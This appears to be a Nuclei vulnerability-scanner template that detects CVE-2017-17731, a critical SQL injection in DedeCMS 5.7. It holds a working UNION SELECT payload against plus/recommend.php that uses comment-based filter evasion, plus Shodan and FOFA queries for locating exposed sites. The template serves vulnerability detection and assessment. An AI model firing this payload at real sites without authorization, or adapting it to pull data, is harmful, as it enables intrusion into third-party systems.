id: CVE-2017-17731

info:
  name: DedeCMS 5.7 - SQL Injection
  author: j4vaovo
  severity: critical
  description: |
    DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17731
    - https://nvd.nist.gov/vuln/detail/CVE-2017-17731
    - https://blog.csdn.net/nixawk/article/details/24982851
    - https://github.com/Lucifer1993/AngelSword/blob/232258e42201373fef1f323864366dc1499581fc/cms/dedecms/dedecms_recommend_sqli.py#L25
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-17731
    cwe-id: CWE-89
    epss-score: 0.14043
    cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
    epss-percentile: 0.94965
  metadata:
    fofa-query: app="DedeCMS"
    max-request: 1
    shodan-query: http.html:"DedeCms"
    vendor: dedecms
    product: dedecms
  tags: sqli,dedecms
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'

      - type: status
        status:
          - 200